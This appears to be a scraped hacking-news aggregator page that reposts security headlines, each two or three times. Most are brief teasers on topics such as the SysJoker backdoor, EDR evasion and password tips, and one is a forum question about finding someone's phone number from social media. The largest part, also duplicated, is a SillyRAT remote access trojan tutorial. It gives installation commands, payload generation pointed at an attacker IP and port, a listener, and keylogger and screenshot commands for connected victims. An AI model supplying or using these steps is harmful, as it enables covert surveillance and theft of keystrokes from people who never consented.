Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
El nuevo backdoor SysJoker apunta a Windows, macOS y Linux
https://cdn-images-1.medium.com/max/1600/0*lBj94q0Babv1--jF
PUBLICADO EN 12 ENERO, 2022 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
El nuevo backdoor SysJoker apunta a Windows, macOS y Linux
https://cdn-images-1.medium.com/max/1600/0*lBj94q0Babv1--jF
PUBLICADO EN 12 ENERO, 2022 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
El nuevo backdoor SysJoker apunta a Windows, macOS y Linux
PUBLICADO EN 12 ENERO, 2022 POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
New Research Reveals Public-Sector IAM Weaknesses and Priorities
Auth0 Public Sector Index shows that governments are struggling to provide trustworthy online citizen services.
___________________________
@hacking_Attack
@Hacking_Video
New Research Reveals Public-Sector IAM Weaknesses and Priorities
Auth0 Public Sector Index shows that governments are struggling to provide trustworthy online citizen services.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
New Research Reveals Public-Sector IAM Weaknesses and Priorities
Auth0 Public Sector Index shows that governments are struggling to provide trustworthy online citizen services.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Oxeye Introduce Open Source Payload Deobfuscation Tool
Ox4Shell exposes hidden payloads thatare actively being used to confuse security protection tools and security teams.
___________________________
@hacking_Attack
@Hacking_Video
Oxeye Introduce Open Source Payload Deobfuscation Tool
Ox4Shell exposes hidden payloads thatare actively being used to confuse security protection tools and security teams.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Oxeye Introduce Open Source Payload Deobfuscation Tool
Ox4Shell exposes hidden payloads thatare actively being used to confuse security protection tools and security teams.
Defeating EDRs with Office Products
https://www.reddit.com/r/redteamsec/comments/s2j4nq/defeating_edrs_with_office_products/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://www.optiv.com/insights/source-zero/blog/defeating-edrs-office-products) [comments] (https://www.reddit.com/r/redteamsec/comments/s2j4nq/defeating_edrs_with_office_products/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/s2j4nq/defeating_edrs_with_office_products/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://www.optiv.com/insights/source-zero/blog/defeating-edrs-office-products) [comments] (https://www.reddit.com/r/redteamsec/comments/s2j4nq/defeating_edrs_with_office_products/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Defeating EDRs with Office Products
Posted in r/redteamsec by u/dmchell • 2 points and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Crash course in Elasticsearch Logstash and Kibana log aggregation
https://external-preview.redd.it/Ya0yiPg-RmCPJG_3gsQkJ2pPrusY0F2AlNX9DxifvbY.jpg?width=216&crop=smart&auto=webp&s=6772d9f917bd584c804736c881055e3bc7c976fb submitted by /u/oxagast
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Crash course in Elasticsearch Logstash and Kibana log aggregation
https://external-preview.redd.it/Ya0yiPg-RmCPJG_3gsQkJ2pPrusY0F2AlNX9DxifvbY.jpg?width=216&crop=smart&auto=webp&s=6772d9f917bd584c804736c881055e3bc7c976fb submitted by /u/oxagast
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Crash course in Elasticsearch Logstash and Kibana log aggregation
Posted in r/hacking by u/oxagast • 1 point and 0 comments
hacking: security in practice
How to find someone’s phone number from their social media?
Is it possible to find someone’s phone number from their social media? Apart from asking obviously
submitted by /u/Previous-String-879
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How to find someone’s phone number from their social media?
Is it possible to find someone’s phone number from their social media? Apart from asking obviously
submitted by /u/Previous-String-879
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How to find someone’s phone number from their social media?
Is it possible to find someone’s phone number from their social media? Apart from asking obviously
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Things to keep in mind while creating strong passwords
https://cdn-images-1.medium.com/max/650/0*xlBvyIW6cBeEV_kl.jpg
Passwords are like underwear, don’t let people see it, change it very often, and you shouldn’t share it with strangers.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Things to keep in mind while creating strong passwords
https://cdn-images-1.medium.com/max/650/0*xlBvyIW6cBeEV_kl.jpg
Passwords are like underwear, don’t let people see it, change it very often, and you shouldn’t share it with strangers.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Things to keep in mind while creating strong passwords
Passwords are like underwear, don’t let people see it, change it very often, and you shouldn’t share it with strangers. If you are a school…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to hire an ethical hacker online.
https://cdn-images-1.medium.com/max/1920/0*DVj6O5OgaV5Kst4M.jpg
cyb3rsploits October 6, 2021
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How to hire an ethical hacker online.
https://cdn-images-1.medium.com/max/1920/0*DVj6O5OgaV5Kst4M.jpg
cyb3rsploits October 6, 2021
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to hire an ethical hacker online.
cyb3rsploits October 6, 2021
PHP Type Juggling
PHP is the dynamic language that checks variables when the program is executing and provides flexibility to the developers. But this…Continue reading on Medium »
Read more...
PHP is the dynamic language that checks variables when the program is executing and provides flexibility to the developers. But this…Continue reading on Medium »
Read more...
PHP Type Juggling
https://medium.com/@shubhamkumarks1999/php-type-juggling-1c6a35ffe3ee?source=rss------bug_bounty-5
PHP is the dynamic language that checks variables when the program is executing and provides flexibility to the developers. But this…Continue reading on Medium » (https://medium.com/@shubhamkumarks1999/php-type-juggling-1c6a35ffe3ee?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@shubhamkumarks1999/php-type-juggling-1c6a35ffe3ee?source=rss------bug_bounty-5
PHP is the dynamic language that checks variables when the program is executing and provides flexibility to the developers. But this…Continue reading on Medium » (https://medium.com/@shubhamkumarks1999/php-type-juggling-1c6a35ffe3ee?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
PHP Type Juggling
PHP is the dynamic language that checks variables when the program is executing and provides flexibility to the developers. But this…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
SillyRAT : A Cross Platform Multifunctional (Windows/Linux/Mac) RAT
SillyRAT is a cross platform RAT written in pure Python. The RAT accept commands alongside arguments to either perform as the server who accepts connections or to perform as the client/target who establish connections to the server. The generate command uses the module pyinstaller to compile the actual payload code. So, in order to generate payload file for your respective platform, you need to be on that platform while generating the file. Moreover, you can directly get the source file as well.
Features
* Built-in Shell for command execution
* Dumping System Information including drives and rams
* Screenshot module. Captures screenshot of client screen.
* Connection Loop (Will continue on connecting to server)
* Currently, it uses BASE64 encoding.
* Pure Python
* Cross Platform. (Tested on Linux. Errors are accepted)
* Source File included for testing
* Python 3
To be expected in future
* Stealth Execution
* Encryption
* Storing Sessions from last attempt
* Pushing Notifications when a client connects
Installation
The tool is tested on Parrot OS with Python 3.8. Follow the steps for installation:
$ git clone https://github.com/hash3liZer/SillyRAT.git
$ cd SillyRAT/
$ pip3 install -r requirements.txt
Documentation
Generating Payload
You can get the payload file in two ways:
* Source File
* Compiled File
The source file is to remain same on all platforms. So, you can generate it on one platform and use it on the other. Getting the source file:
$ python3 server.py generate –address 134.276.92.1 –port 2999 –output /tmp/payload.py –source
The compiled version has to generated on the respective platform. For example, you can’t generate an .exe file on Linux. You specifically have to be on Windows. The tool is still under testing. So, all kinds of errors are accepted. Make sure to open an issue though. Generating the Compiled Version for Linux:
$ python3 server.py generate –address 134.276.92.1 –port 2999 –output /tmp/filer
https://blogger.googleusercontent.com/img/a/AVvXsEiiP2rvzroiFqVPQF7nWfOPFi6UtI8H9OHIp0lo6YikdUKty-79fwFmkRDHYPpZShCdOmz1Hwbm_dGu6HRfSbEjOwaanhRrbzYJuIO-5b9RYAlE9dL6IKLAmgWG9wNR1wSLE25a_mCq_OfbDHu6_5Y3NijJ6fXYOIb6EfFcc0Eh41Nq2W3e7bLE3Hvs=s1882
Replace your IP Address and Port on above commands.
Running Server
The server must be executed on Linux. You can buy a VPS or Cloud Server for connections. For the record, the server doesn’t store any session from last run. So, all the progress will lost once the server application gets terminated. Running your server:
$ python3 sillyrat.py bind –address 0.0.0.0 –port 2999
Connections
All the connections will be listed under sessions command:
$ sessions
https://blogger.googleusercontent.com/img/a/AVvXsEjHaNcteXtCI1tPmYXHv11PvTg9RZJV7YOiX95Yid-ay4lTP_XyZIbmVM3NOgoaNUYCcOwuF8BXE8YYO_jNqRJ0M2LFpMSkLY9SrrkPcQG3sRppy-DTdunWwZpfNhWk61MLSIEAhGmtdUZBlV4SioruK2pC0IBY__jPRXSgWetxC9upn1O8WNCXU7VY=s1882
You can connect to you target session with connect command and launch one of available commands:
$ connect ID
$ keylogger on
$ keylogger dump
$ screenshot
https://blogger.googleusercontent.com/img/a/AVvXsEh3qze1H8xzlDogM1Ppjh5p79QIBDuBffor6UpS4HsN9d9NFMhriOiS02-gWFpVt2bVIECfLUR8Jx4UJj6pIMIv7MjoxlIxamrEWNFCOG1mK2nEuPVZoM2lDXqNFUK1qAgHgjWRM-S8Ozj3mSGwrZhTLbQPDbk0WRWKctik7gXHVeSGOInpSeaosRhR=s1882
Help
Get a list of available commands:
$ help
Help on a Specific Command:
$ help COMMAND
Download
___________________________
@hacking_Attack
@Hacking_Video
SillyRAT : A Cross Platform Multifunctional (Windows/Linux/Mac) RAT
SillyRAT is a cross platform RAT written in pure Python. The RAT accept commands alongside arguments to either perform as the server who accepts connections or to perform as the client/target who establish connections to the server. The generate command uses the module pyinstaller to compile the actual payload code. So, in order to generate payload file for your respective platform, you need to be on that platform while generating the file. Moreover, you can directly get the source file as well.
Features
* Built-in Shell for command execution
* Dumping System Information including drives and rams
* Screenshot module. Captures screenshot of client screen.
* Connection Loop (Will continue on connecting to server)
* Currently, it uses BASE64 encoding.
* Pure Python
* Cross Platform. (Tested on Linux. Errors are accepted)
* Source File included for testing
* Python 3
To be expected in future
* Stealth Execution
* Encryption
* Storing Sessions from last attempt
* Pushing Notifications when a client connects
Installation
The tool is tested on Parrot OS with Python 3.8. Follow the steps for installation:
$ git clone https://github.com/hash3liZer/SillyRAT.git
$ cd SillyRAT/
$ pip3 install -r requirements.txt
Documentation
Generating Payload
You can get the payload file in two ways:
* Source File
* Compiled File
The source file is to remain same on all platforms. So, you can generate it on one platform and use it on the other. Getting the source file:
$ python3 server.py generate –address 134.276.92.1 –port 2999 –output /tmp/payload.py –source
The compiled version has to generated on the respective platform. For example, you can’t generate an .exe file on Linux. You specifically have to be on Windows. The tool is still under testing. So, all kinds of errors are accepted. Make sure to open an issue though. Generating the Compiled Version for Linux:
$ python3 server.py generate –address 134.276.92.1 –port 2999 –output /tmp/filer
https://blogger.googleusercontent.com/img/a/AVvXsEiiP2rvzroiFqVPQF7nWfOPFi6UtI8H9OHIp0lo6YikdUKty-79fwFmkRDHYPpZShCdOmz1Hwbm_dGu6HRfSbEjOwaanhRrbzYJuIO-5b9RYAlE9dL6IKLAmgWG9wNR1wSLE25a_mCq_OfbDHu6_5Y3NijJ6fXYOIb6EfFcc0Eh41Nq2W3e7bLE3Hvs=s1882
Replace your IP Address and Port on above commands.
Running Server
The server must be executed on Linux. You can buy a VPS or Cloud Server for connections. For the record, the server doesn’t store any session from last run. So, all the progress will lost once the server application gets terminated. Running your server:
$ python3 sillyrat.py bind –address 0.0.0.0 –port 2999
Connections
All the connections will be listed under sessions command:
$ sessions
https://blogger.googleusercontent.com/img/a/AVvXsEjHaNcteXtCI1tPmYXHv11PvTg9RZJV7YOiX95Yid-ay4lTP_XyZIbmVM3NOgoaNUYCcOwuF8BXE8YYO_jNqRJ0M2LFpMSkLY9SrrkPcQG3sRppy-DTdunWwZpfNhWk61MLSIEAhGmtdUZBlV4SioruK2pC0IBY__jPRXSgWetxC9upn1O8WNCXU7VY=s1882
You can connect to you target session with connect command and launch one of available commands:
$ connect ID
$ keylogger on
$ keylogger dump
$ screenshot
https://blogger.googleusercontent.com/img/a/AVvXsEh3qze1H8xzlDogM1Ppjh5p79QIBDuBffor6UpS4HsN9d9NFMhriOiS02-gWFpVt2bVIECfLUR8Jx4UJj6pIMIv7MjoxlIxamrEWNFCOG1mK2nEuPVZoM2lDXqNFUK1qAgHgjWRM-S8Ozj3mSGwrZhTLbQPDbk0WRWKctik7gXHVeSGOInpSeaosRhR=s1882
Help
Get a list of available commands:
$ help
Help on a Specific Command:
$ help COMMAND
Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
SillyRAT : A Cross Platform Multifunctional (Windows/Linux/Mac) RAT
SillyRAT is a cross platform RAT written in pure Python. The RAT accept commands alongside arguments to either perform as the server.
Wading Through Muddy Waters | Recent Activity of an Iranian State-Sponsored Threat Actor
https://www.reddit.com/r/redteamsec/comments/s2t2qs/wading_through_muddy_waters_recent_activity_of_an/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/) [comments] (https://www.reddit.com/r/redteamsec/comments/s2t2qs/wading_through_muddy_waters_recent_activity_of_an/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/s2t2qs/wading_through_muddy_waters_recent_activity_of_an/
submitted by /u/dmchell (https://www.reddit.com/user/dmchell)
[link] (https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/) [comments] (https://www.reddit.com/r/redteamsec/comments/s2t2qs/wading_through_muddy_waters_recent_activity_of_an/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Wading Through Muddy Waters | Recent Activity of an Iranian...
Posted in r/redteamsec by u/dmchell • 1 point and 0 comments